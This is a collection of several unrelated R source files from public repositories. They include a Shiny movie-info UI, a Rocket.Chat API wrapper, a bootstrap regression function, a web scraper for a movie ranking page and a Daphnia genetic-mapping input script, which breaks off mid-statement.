type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might3 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[3],'poster'])
})
observeEvent(input$cluster_select3,{
id = id_list[3]
output$cluster_might_info3 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might4 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[4],'poster'])
})
observeEvent(input$cluster_select4,{
id = id_list[4]
output$cluster_might_info4 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might5 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[5],'poster'])
})
observeEvent(input$cluster_select5,{
id = id_list[5]
output$cluster_might_info5 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might6 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[6],'poster'])
})
observeEvent(input$cluster_select6,{
id = id_list[6]
output$cluster_might_info6 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
})
}
|
#' Channel Set Purpose
#'
#' Sets the description for the channel (the same as channels.setDescription, obsolete).
#'
#' @param token The token to connect to the app.
#' @param roomid The channel’s id Required
#' @param purpose The description to set for the channel. Required
#'
#' @export
#' @importFrom httr POST GET add_headers content stop_for_status
#' @importFrom jsonlite toJSON
channels_channel_set_purpose <- function(tok,
roomid,
purpose) {
params <- list(
roomid = roomid,
purpose = purpose
)
params <- no_null(params)
params <- toJSON(params, auto_unbox = TRUE)
res <- httr::POST(
add_headers(
"Content-type" = "application/json",
"X-Auth-Token" = tok$data$authToken,
"X-User-Id" = tok$data$userId
),
url = paste0(tok$url, "/api/v1/channels.setPurpose"),
body = params
)
stop_for_status(res)
content(res)
}
| /R/channels_channel_set_purpose.R | no_license | ColinFay/rrocketchat | R | false | false | 965 | r | #' Channel Set Purpose
#'
#' Sets the description for the channel (the same as channels.setDescription, obsolete).
#'
#' @param token The token to connect to the app.
#' @param roomid The channel’s id Required
#' @param purpose The description to set for the channel. Required
#'
#' @export
#' @importFrom httr POST GET add_headers content stop_for_status
#' @importFrom jsonlite toJSON
channels_channel_set_purpose <- function(tok,
roomid,
purpose) {
params <- list(
roomid = roomid,
purpose = purpose
)
params <- no_null(params)
params <- toJSON(params, auto_unbox = TRUE)
res <- httr::POST(
add_headers(
"Content-type" = "application/json",
"X-Auth-Token" = tok$data$authToken,
"X-User-Id" = tok$data$userId
),
url = paste0(tok$url, "/api/v1/channels.setPurpose"),
body = params
)
stop_for_status(res)
content(res)
}
|
test_that("Package readme can be built ", {
skip_on_cran()
on.exit(unlink(c("testReadme/README.md", "testReadme/man/figures"), recursive = TRUE))
suppressMessages(build_readme("testReadme"))
expect_true(file.exists(file.path("testReadme", "README.md")))
expect_false(file.exists(file.path("testReadme", "README.html")))
})
| /tests/testthat/test-build-readme.R | no_license | ricciardi/devtools | R | false | false | 336 | r | test_that("Package readme can be built ", {
skip_on_cran()
on.exit(unlink(c("testReadme/README.md", "testReadme/man/figures"), recursive = TRUE))
suppressMessages(build_readme("testReadme"))
expect_true(file.exists(file.path("testReadme", "README.md")))
expect_false(file.exists(file.path("testReadme", "README.html")))
})
|
testlist <- list(Beta = 0, CVLinf = 86341236051411296, FM = 1.53632495265886e-311, L50 = 0, L95 = 0, LenBins = c(2.0975686864138e+162, -2.68131210337361e-144, -1.11215735981244e+199, -4.48649879577108e+143, 1.6611802228813e+218, 900371.947279558, 1.07063092954708e+238, 2.88003257377011e-142, 1.29554141202795e-89, -1.87294312860528e-75, 3.04319010211815e+31, 191.463561345044, 1.58785813294449e+217, 1.90326589719466e-118, -3.75494418025505e-296, -2.63346094087863e+200, -5.15510035957975e+44, 2.59028521047075e+149, 1.60517426337473e+72, 1.74851929178852e+35, 1.32201752290843e-186, -1.29599553894715e-227, 3.20314220604904e+207, 584155875718587, 1.71017833066717e-283, -3.96505607598107e+51, 5.04440990041945e-163, -5.09127626480085e+268, 2.88137633290038e+175, 6.22724404181897e-256, 4.94195713773372e-295, 5.80049493946414e+160, -5612008.23597089, -2.68347267272935e-262, 1.28861520348431e-305, -5.05455182157157e-136, 4.44386438170367e+50, -2.07294901774837e+254, -3.56325845332496e+62, -1.38575911145229e-262, -1.19026551334786e-217, -3.54406233509625e-43, -4.15938611724176e-209, -3.06799941292011e-106, 1.78044357763692e+244, -1.24657398993838e+190, 1.14089212334828e-90, 136766.715673668, -1.4733334572789e-67, -2.92763930406321e+21 ), LenMids = c(-1.121210344879e+131, -1.121210344879e+131, NaN), Linf = 2.81991272491703e-308, MK = -2.08633459786369e-239, Ml = c(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), Prob = structure(c(4.48157192325537e-103, 2.43305969276274e+59, 6.5730975202806e-96, 2.03987918888949e-104, 4.61871336464985e-39, 1.10811931066926e+139), .Dim = c(1L, 6L)), SL50 = 9.97941197291525e-316, SL95 = 2.12248160522076e-314, nage = 682962941L, nlen = 1623851345L, rLens = c(4.74956174024781e+199, -7.42049538387034e+278, -5.82966399158032e-71, -6.07988133887702e-34, 4.62037926128924e-295, -8.48833146280612e+43, 2.71954993859316e-126 ))
result <- do.call(DLMtool::LBSPRgen,testlist)
str(result) | /DLMtool/inst/testfiles/LBSPRgen/AFL_LBSPRgen/LBSPRgen_valgrind_files/1615832181-test.R | no_license | akhikolla/updatedatatype-list2 | R | false | false | 2,047 | r | testlist <- list(Beta = 0, CVLinf = 86341236051411296, FM = 1.53632495265886e-311, L50 = 0, L95 = 0, LenBins = c(2.0975686864138e+162, -2.68131210337361e-144, -1.11215735981244e+199, -4.48649879577108e+143, 1.6611802228813e+218, 900371.947279558, 1.07063092954708e+238, 2.88003257377011e-142, 1.29554141202795e-89, -1.87294312860528e-75, 3.04319010211815e+31, 191.463561345044, 1.58785813294449e+217, 1.90326589719466e-118, -3.75494418025505e-296, -2.63346094087863e+200, -5.15510035957975e+44, 2.59028521047075e+149, 1.60517426337473e+72, 1.74851929178852e+35, 1.32201752290843e-186, -1.29599553894715e-227, 3.20314220604904e+207, 584155875718587, 1.71017833066717e-283, -3.96505607598107e+51, 5.04440990041945e-163, -5.09127626480085e+268, 2.88137633290038e+175, 6.22724404181897e-256, 4.94195713773372e-295, 5.80049493946414e+160, -5612008.23597089, -2.68347267272935e-262, 1.28861520348431e-305, -5.05455182157157e-136, 4.44386438170367e+50, -2.07294901774837e+254, -3.56325845332496e+62, -1.38575911145229e-262, -1.19026551334786e-217, -3.54406233509625e-43, -4.15938611724176e-209, -3.06799941292011e-106, 1.78044357763692e+244, -1.24657398993838e+190, 1.14089212334828e-90, 136766.715673668, -1.4733334572789e-67, -2.92763930406321e+21 ), LenMids = c(-1.121210344879e+131, -1.121210344879e+131, NaN), Linf = 2.81991272491703e-308, MK = -2.08633459786369e-239, Ml = c(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), Prob = structure(c(4.48157192325537e-103, 2.43305969276274e+59, 6.5730975202806e-96, 2.03987918888949e-104, 4.61871336464985e-39, 1.10811931066926e+139), .Dim = c(1L, 6L)), SL50 = 9.97941197291525e-316, SL95 = 2.12248160522076e-314, nage = 682962941L, nlen = 1623851345L, rLens = c(4.74956174024781e+199, -7.42049538387034e+278, -5.82966399158032e-71, -6.07988133887702e-34, 4.62037926128924e-295, -8.48833146280612e+43, 2.71954993859316e-126 ))
result <- do.call(DLMtool::LBSPRgen,testlist)
str(result) |
boot.slope.bca <-
function(x, y, null.hyp = NULL, alternative = c("two.sided","less","greater"),
conf.level = 0.95, type = NULL, R = 9999)
{
# require(boot)
obs <- cor(x,y)
test <- !is.null(null.hyp)
data <- data.frame(x,y)
obs <- lm(y~x)$coeff[2]
boot.slope <- suppressWarnings(boot(data,function(d,i) lm(d$y[i]~d$x[i],data=d)$coeff[2],R=R))
z <- c(boot.slope$t)
z <- z[(!is.infinite(z) & !is.na(z))] # To eliminate resamples with undefined correlation due to a 0 variance.
R <- length(z) # To adjust for eliminated resamples.
bias <- signif(mean(z)-obs,digits=3)
percent.bias <- signif(100*abs(bias/obs),digits=3)
cl <- paste(100*conf.level,"%",sep="")
if (identical(alternative,c("two.sided","less","greater"))) alternative <- "two.sided"
z1 <- mean(z < obs)
z0 <- qnorm(z1)
n <- length(x)
d <- vector(length=n)
for (j in 1:n) d[j] <- suppressWarnings(cor(data$x[-j],data$y[-j]))
d <- d[(!is.infinite(d) & !is.na(d))]
mean.d <- mean(d)
a0 <- -sum((d-mean.d)^3)/(6*(sum((d-mean.d)^2))^(3/2))
# FOR THE HYPOTHESIS TEST
if (test)
{
rtp <- (sum((z < null.hyp))+(sum((z == null.hyp))+1)/2)/(R+1)
b0 <- qnorm(rtp)
c0 <- ((2+a0*b0-a0*z0)*z0-b0)/(1+a0*b0-a0*z0)
p0 <- pnorm(c0); # P-value for a left-tailed test
tc <- c("two.sided","less","greater")
pc <- c(2*min(p0,1-p0),p0,1-p0)
p <- signif(pc[tc==alternative],digits=3)
pv <- c((p>=0.001)&(p<=0.999),(p<0.001),(p>0.999))
pt <- c(p,"P < 0.001","P > 0.999")
p.value <- pt[pv]
ac <- c("not-equal","less-than","greater-than")
alt <- ac[tc==alternative]
}
# FOR THE CONFIDENCE INTERVAL
tci <- c("two.sided","greater","less")
ti <- c("two-sided","lower-bound","upper-bound")
if (is.null(type)) type <- ti[tci==alternative]
a <- if (identical(type,"two-sided")) (1-conf.level)/2 else 1-conf.level
za <- qnorm(a,lower.tail=FALSE)
a1 <- pnorm(z0+(z0-za)/(1-a0*(z0-za)))
a2 <- pnorm(z0+(z0+za)/(1-a0*(z0+za)))
q <- signif(quantile(z,p=c(a1,a2)),digits=4)
li <- c(paste("(",q[1],", ",q[2],")",sep=""),paste(q[1],"(LCB)"),paste(q[2],"(UCB)"))
CI <- li[ti==type]
lims <- list(q,q[1],q[2])
llims <- lims[[c(1:3)[ti==type]]]
# FOR THE RESULTS
var1.name <- all.names(substitute(x))
if (length(var1.name)>1) var1.name <- var1.name[[3]]
var2.name <- all.names(substitute(y))
if (length(var2.name)>1) var2.name <- var2.name[[3]]
stat.name <- "slope"
if (!test) {alt <- NULL; p.value <- NULL; p <- NULL}
results <-
list(Boot.values=z,Confidence.limits=llims,
Header=paste("RESULTS OF BCa BOOTSTRAP FOR",toupper(stat.name)),
Variable.1=var1.name,Variable.2=var2.name,n=length(x),
Statistic=stat.name,Observed=obs,Replications=R,Mean=mean(z),
SE=sd(z),Bias=bias,Percent.bias=percent.bias,Null=null.hyp,
Alternative=alt,P.value=p.value,p.value=p,Level=cl,Type=type,
Confidence.interval=CI,cor.ana=FALSE)
class(results) <- "boot.regcor" # bootstrap, regression and correlation
results
}
| /wBoot/R/boot.slope.bca.R | no_license | ingted/R-Examples | R | false | false | 2,964 | r | boot.slope.bca <-
function(x, y, null.hyp = NULL, alternative = c("two.sided","less","greater"),
conf.level = 0.95, type = NULL, R = 9999)
{
# require(boot)
obs <- cor(x,y)
test <- !is.null(null.hyp)
data <- data.frame(x,y)
obs <- lm(y~x)$coeff[2]
boot.slope <- suppressWarnings(boot(data,function(d,i) lm(d$y[i]~d$x[i],data=d)$coeff[2],R=R))
z <- c(boot.slope$t)
z <- z[(!is.infinite(z) & !is.na(z))] # To eliminate resamples with undefined correlation due to a 0 variance.
R <- length(z) # To adjust for eliminated resamples.
bias <- signif(mean(z)-obs,digits=3)
percent.bias <- signif(100*abs(bias/obs),digits=3)
cl <- paste(100*conf.level,"%",sep="")
if (identical(alternative,c("two.sided","less","greater"))) alternative <- "two.sided"
z1 <- mean(z < obs)
z0 <- qnorm(z1)
n <- length(x)
d <- vector(length=n)
for (j in 1:n) d[j] <- suppressWarnings(cor(data$x[-j],data$y[-j]))
d <- d[(!is.infinite(d) & !is.na(d))]
mean.d <- mean(d)
a0 <- -sum((d-mean.d)^3)/(6*(sum((d-mean.d)^2))^(3/2))
# FOR THE HYPOTHESIS TEST
if (test)
{
rtp <- (sum((z < null.hyp))+(sum((z == null.hyp))+1)/2)/(R+1)
b0 <- qnorm(rtp)
c0 <- ((2+a0*b0-a0*z0)*z0-b0)/(1+a0*b0-a0*z0)
p0 <- pnorm(c0); # P-value for a left-tailed test
tc <- c("two.sided","less","greater")
pc <- c(2*min(p0,1-p0),p0,1-p0)
p <- signif(pc[tc==alternative],digits=3)
pv <- c((p>=0.001)&(p<=0.999),(p<0.001),(p>0.999))
pt <- c(p,"P < 0.001","P > 0.999")
p.value <- pt[pv]
ac <- c("not-equal","less-than","greater-than")
alt <- ac[tc==alternative]
}
# FOR THE CONFIDENCE INTERVAL
tci <- c("two.sided","greater","less")
ti <- c("two-sided","lower-bound","upper-bound")
if (is.null(type)) type <- ti[tci==alternative]
a <- if (identical(type,"two-sided")) (1-conf.level)/2 else 1-conf.level
za <- qnorm(a,lower.tail=FALSE)
a1 <- pnorm(z0+(z0-za)/(1-a0*(z0-za)))
a2 <- pnorm(z0+(z0+za)/(1-a0*(z0+za)))
q <- signif(quantile(z,p=c(a1,a2)),digits=4)
li <- c(paste("(",q[1],", ",q[2],")",sep=""),paste(q[1],"(LCB)"),paste(q[2],"(UCB)"))
CI <- li[ti==type]
lims <- list(q,q[1],q[2])
llims <- lims[[c(1:3)[ti==type]]]
# FOR THE RESULTS
var1.name <- all.names(substitute(x))
if (length(var1.name)>1) var1.name <- var1.name[[3]]
var2.name <- all.names(substitute(y))
if (length(var2.name)>1) var2.name <- var2.name[[3]]
stat.name <- "slope"
if (!test) {alt <- NULL; p.value <- NULL; p <- NULL}
results <-
list(Boot.values=z,Confidence.limits=llims,
Header=paste("RESULTS OF BCa BOOTSTRAP FOR",toupper(stat.name)),
Variable.1=var1.name,Variable.2=var2.name,n=length(x),
Statistic=stat.name,Observed=obs,Replications=R,Mean=mean(z),
SE=sd(z),Bias=bias,Percent.bias=percent.bias,Null=null.hyp,
Alternative=alt,P.value=p.value,p.value=p,Level=cl,Type=type,
Confidence.interval=CI,cor.ana=FALSE)
class(results) <- "boot.regcor" # bootstrap, regression and correlation
results
}
|
#--------- Read from CSV File (Remember reverse slashes) -----------
LoggerResults = read.csv("C:/Data Repositry/Elspec/TestResults/TEST140/PQSExport_20150216_095845_Ne02b_Wave.csv", header=T)
LoggerResults$TIMESTAMP <- dmy_hm(LoggerResults$X.DATEANDTIME) + as.numeric(LoggerResults$X.SECONDS.)
#--------- Set Window timeframe-------
message(min(LoggerResults$TIMESTAMP))
message(max(LoggerResults$TIMESTAMP))
#--------Insert min and max times here and refine manually to locate fault -------------
StartTime <- as.POSIXct("2015-02-16 09:59:04", format = "%Y-%m-%d %H:%M:%OS", tz = "UTC")
EndTime <- as.POSIXct("2015-02-16 09:59:21.1", format = "%Y-%m-%d %H:%M:%OS", tz = "UTC")
FilteredResults <- subset(LoggerResults, LoggerResults$TIMESTAMP >= StartTime & LoggerResults$TIMESTAMP <= EndTime)
#--------- Set up plotter to view 3 graphs and graph currents -----
plot.new()
frame()
par(mfrow=c(3,1))
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI1.)
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI2.)
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI3.)
#---------- Mark window length as a test and write back to new csv file ----
LoggerResults$Testing <- ifelse(LoggerResults$TIMESTAMP >= StartTime, ifelse(LoggerResults$TIMESTAMP <= EndTime, 1,0),0)
write.csv(LoggerResults, file= "C:/Data Repositry/Elspec/TestResults/Test140Results.csv") | /TEST226.R | no_license | acousland/Elspec_Sample_Analysis | R | false | false | 1,384 | r |
#--------- Read from CSV File (Remember reverse slashes) -----------
LoggerResults = read.csv("C:/Data Repositry/Elspec/TestResults/TEST140/PQSExport_20150216_095845_Ne02b_Wave.csv", header=T)
LoggerResults$TIMESTAMP <- dmy_hm(LoggerResults$X.DATEANDTIME) + as.numeric(LoggerResults$X.SECONDS.)
#--------- Set Window timeframe-------
message(min(LoggerResults$TIMESTAMP))
message(max(LoggerResults$TIMESTAMP))
#--------Insert min and max times here and refine manually to locate fault -------------
StartTime <- as.POSIXct("2015-02-16 09:59:04", format = "%Y-%m-%d %H:%M:%OS", tz = "UTC")
EndTime <- as.POSIXct("2015-02-16 09:59:21.1", format = "%Y-%m-%d %H:%M:%OS", tz = "UTC")
FilteredResults <- subset(LoggerResults, LoggerResults$TIMESTAMP >= StartTime & LoggerResults$TIMESTAMP <= EndTime)
#--------- Set up plotter to view 3 graphs and graph currents -----
plot.new()
frame()
par(mfrow=c(3,1))
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI1.)
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI2.)
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI3.)
#---------- Mark window length as a test and write back to new csv file ----
LoggerResults$Testing <- ifelse(LoggerResults$TIMESTAMP >= StartTime, ifelse(LoggerResults$TIMESTAMP <= EndTime, 1,0),0)
write.csv(LoggerResults, file= "C:/Data Repositry/Elspec/TestResults/Test140Results.csv") |
library(robotstxt)
path<-paths_allowed("https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/")
library(rvest)
link<-"https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/"
web<-read_html(link)
library(dplyr)
movie_name<-web%>%html_nodes("#top_movies_main .articleLink")%>%html_text()
movie_rating<-web%>%html_nodes("#top_movies_main .tMeterScore")%>%html_text()
View(movie_rating)
View(movie_name)
movie_IMDB<-data.frame(movie_rating,movie_name)
View(movie_IMDB)
| /RA1811003020259 (1).R | no_license | Nasirsohail/Nasirsohail | R | false | false | 508 | r | library(robotstxt)
path<-paths_allowed("https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/")
library(rvest)
link<-"https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/"
web<-read_html(link)
library(dplyr)
movie_name<-web%>%html_nodes("#top_movies_main .articleLink")%>%html_text()
movie_rating<-web%>%html_nodes("#top_movies_main .tMeterScore")%>%html_text()
View(movie_rating)
View(movie_name)
movie_IMDB<-data.frame(movie_rating,movie_name)
View(movie_IMDB)
|
#module load intel/18.0 intelmpi/18.0 R/3.6.3; R
### makes rabbit input
args = commandArgs(trailingOnly=TRUE)
chr.i <- as.character(args[1])
maxcM <- as.numeric(args[2])
f1s.set <- as.character(args[3])
#chr.i <- "Scaffold_1863_HRSCAF_2081"; maxcM=10; f1s.set <- "all"
### libraries
library(data.table)
library(SeqArray)
library(foreach)
### set wd
setwd("/project/berglandlab/Karen/MappingDec2019/WithPulicaria/June2020")
### load SuperClone
sc <- fread("Superclones201617182019withObtusaandPulicaria_kingcorr_20200623_wmedrd.txt")
### which F1s?
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.onlyPheno.delim")
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.allF1s.delim")
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.all_AxC_F1s.delim")
if(f1s.set=="onlyPheno_AxC") {
f1s <- sc[AxCF1Hybrid==1][OneLiterPheno==1]$clone
} else if (f1s.set=="wildF1s_AxC"){
f1s <- sc[AxCF1Hybrid==1][OneLiterPheno==0]$clone
} else if(f1s.set=="all_AxC") {
f1s <- sc[AxCF1Hybrid==1]$clone
} else if(f1s.set=="all_CxC") {
f1s <- sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone
} else if(f1s.set=="all") {
f1s <- c(sc[AxCF1Hybrid==1]$clone,
sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone)
}
f1s <- data.table(clone=f1s)
### open GDS
genofile <- seqOpen("/project/berglandlab/Karen/MappingDec2019/WithPulicaria/June2020/MapJune2020_ann.seq.gds", allow.duplicate=TRUE)
### load in filter file
snpFilter <- fread("snpsvarpulexpresentinhalf_table_20200623")
### make snp.dt
snp.dt <- data.table(chr=seqGetData(genofile, "chromosome"),
pos=seqGetData(genofile, "position"),
id=seqGetData(genofile, "variant.id"),
numAlleles=seqNumAllele(genofile),
key="chr")
setkey(snpFilter, chr, pos)
setkey(snp.dt, chr, pos)
snp.dt <- merge(snpFilter, snp.dt)
### make majority rule (consensus) genotype calls for
ac.fd <- foreach(sc.i=c("A", "C"), .combine="cbind")%do%{
seqResetFilter(genofile)
seqSetFilter(genofile, sample.id=sc[SC==sc.i]$clone, variant.id=snp.dt$id)
data.table(af=seqAlleleFreq(genofile, ref.allele=1L)) ### alternate allele
}
setnames(ac.fd, c(1,2), c("af.A", "af.C"))
ac.fd <- cbind(ac.fd, snp.dt)
ac.fd[!is.na(af.A),A.geno := unlist(sapply(ac.fd[!is.na(af.A)]$af.A, function(x) c("11","12","22")[which.min(abs(x-c(0,.5,1)))]))]
ac.fd[!is.na(af.C),C.geno := unlist(sapply(ac.fd[!is.na(af.C)]$af.C, function(x) c("11","12","22")[which.min(abs(x-c(0,.5,1)))]))]
ac.fd[!is.na(af.A),A.delta := unlist(sapply(ac.fd[!is.na(af.A)]$af.A, function(x) min(abs(x-c(0,.5,1)))))]
ac.fd[!is.na(af.C),C.delta := unlist(sapply(ac.fd[!is.na(af.C)]$af.C, function(x) min(abs(x-c(0,.5,1)))))]
ac.fd <- ac.fd[A.delta < 0.05 & C.delta < 0.05]
ac.inform <- ac.fd[(A.geno=="12" & C.geno=="11") |
(A.geno=="12" & C.geno=="22") |
(A.geno=="11" & C.geno=="12") |
(A.geno=="22" & C.geno=="12") |
(A.geno=="12" & C.geno=="12") |
(A.geno=="11" & C.geno=="22") |
(A.geno=="22" & C.geno=="11") ]
ac.inform <- ac.inform[chr==chr.i]
ac.inform[,pos.bin:=round(pos/1e5)]
### select sites in F1s with lowest amount of missing data
seqResetFilter(genofile)
seqSetFilter(genofile,
sample.id=f1s$clone,
variant.id=ac.inform$id)
mr <- data.table(id=seqGetData(genofile, "variant.id"),
mr=seqMissing(genofile))
mr <- merge(mr, snp.dt, by="id")
### check to see if missing rates are homogeneously distributed throughout the genome.
mr[,pos.bin:=round(pos/1e5)]
mr.ag <- mr[,list(nLow=sum(mr<.25), n=length(mr)), list(pos.bin)]
summary(mr.ag$nLow/mr.ag$n)
### trim out position bins with high rates of missing data (i.e., when nLow/n is high. mr=missing rate so a low is good; we want windows with a lot of sites with low missing rates, i.e. with y>.5)
#ggplot(data=mr.ag[nLow/n>.5], aes(y=nLow/n, x=pos.bin)) + geom_line()
### select windows with low rates of high missing rat ( 50% )
setkey(ac.inform, pos.bin)
ac.inform <- ac.inform[J(mr.ag[nLow/n >.5]$pos.bin)]
### trim to sites with low rates of missing data
ac.inform <- merge(ac.inform, mr[,c("id", "mr"), with=F], by="id")
ac.inform <- ac.inform[mr<.25]
### subsample
ac.inform.ag <- ac.inform[,list(n=length(id)), list(pos.bin)]
sample.fun <- function(x, n) {
if(length(x)<=n) return(x)
if(length(x)>n) return(sort(as.integer(sample(as.character(x), size=n))))
}
set.seed(1234)
ac.inform.sub <- ac.inform[,list(id=sample.fun(id, 50000)), list(pos.bin)]
setkey(ac.inform.sub, pos.bin, id)
setkey(ac.inform, pos.bin, id)
ac.inform <- merge(ac.inform, ac.inform.sub)
ac.inform[,list(n=length(id)), list(pos.bin)]
### make parents
A.parent <- c("A", ac.inform$A.geno)
C.parent <- c("C", ac.inform$C.geno)
head(A.parent)
head(C.parent)
parents <- rbind(A.parent, C.parent)
head(parents[,1:10])
### load & format offspring
seqResetFilter(genofile)
seqSetFilter(genofile,
sample.id=f1s$clone,
variant.id=ac.inform$id)
genomat <- as.data.table(t(seqGetData(genofile, "$dosage")))
setnames(genomat, seqGetData(genofile, "sample.id"))
genomat[,id:=seqGetData(genofile, "variant.id")]
### check
genomat.l <- melt(genomat, id.vars="id")
genomat.l.ag <- genomat.l[,list(n22=sum(value==0, na.rm=T), n12=sum(value==1, na.rm=T), n11=sum(value==2, na.rm=T)), list(id)]
gp <- merge(genomat.l.ag, ac.inform, by="id")
offspring <- foreach(ind.i=f1s$clone, .combine="rbind", .errorhandling="remove")%do%{
tmp <- t(as.matrix(genomat[,ind.i, with=F]))
tmp[tmp=="0"] <- "2N"
#tmp[tmp=="1"] <- sample(c("1N","2N"), dim(tmp)[1], replace=T)
tmp[tmp=="1"] <- "12"
tmp[tmp=="2"] <- "1N"
tmp[is.na(tmp)] <- "NN"
cbind(matrix(ind.i, ncol=1), tmp)
}
dim(offspring)
offspring[1:5,1:10]
### make header
marker <- matrix(c("marker", seqGetData(genofile, "variant.id")), nrow=1)
#chr <- matrix(c("chromosome", rep(NA, dim(genomat)[1])), nrow=1)
#pos <- matrix(c("pos(cM)", rep(NA, dim(genomat)[1])), nrow=1)
chr <- matrix(c("chromosome", rep(as.numeric(as.factor(chr.i)), dim(marker)[2]-1)), nrow=1)
pos <- matrix(c("pos(cM)", seq(from=0, to=maxcM, length.out=dim(marker)[2]-1)), nrow=1)
header <- do.call("rbind", list(marker, chr, pos))
### combine
out <- do.call("rbind", list(header, parents, offspring))
rownames(out) <- NULL
out[1:7,1:4]
### write
out.fn <- paste("/scratch/aob2x/daphnia_hwe_sims/Rabbit_phase_", maxcM, "cm/", chr.i, "/", chr.i, ".all.in", sep="")
writeLines( paste("#founders,",2, sep=""),
con=out.fn
)
options(scipen=999)
write.table(out,
file=out.fn,
quote=FALSE,
row.names=FALSE,
col.names=FALSE,
sep=",",
na="NA",
append=TRUE)
### make ped file
ped.fn <- paste("/scratch/aob2x/daphnia_hwe_sims/Rabbit_phase_", maxcM, "cm/", chr.i, "/", chr.i, ".ped", sep="")
if(f1s.set!="all") {
writeLines( "Pedigree-Information,DesignPedigree\nGeneration,MemberID,Female=1/Male=2/Hermaphrodite=0,MotherID,FatherID\n0,1,1,0,0\n0,2,2,0,0\n1,3,0,1,2\nPedigree-Information,SampleInfor\nProgenyLine,MemberID,Funnelcode",
con=ped.fn
)
f1s[,id:=3]
f1s[,fc:="1-2"]
} else if(f1s.set=="all" ) {
